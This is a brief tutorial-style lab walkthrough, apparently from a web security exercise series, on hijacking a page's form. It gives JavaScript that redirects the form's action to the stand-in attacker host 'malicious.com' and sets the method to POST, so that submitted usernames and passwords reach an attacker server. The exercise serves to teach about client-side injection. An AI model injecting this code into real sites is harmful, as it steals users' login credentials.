Task 3 [Try Now]
Objectives:
- Post the Username and Password to Attacker Controlled Server
By default, the form is submitted to the url mentioned in action attribute of form tag. If it's not set, the action will defaults to current url
Luckily here button behaviour is set to Submit. Also if you see there is only one form in whole page. So you can use Document.forms to get an array of forms. In this case, we have only 1 form. So modifying it would be like this
document.forms[0].action = "http://malicious.com";Now we are also supposed to POST the data. In form you can set the methods using method=POST attribute. If this is not mentioned, it defaults to GET method. READ MORE
document.forms[0].method = "POST";For POC, Click Here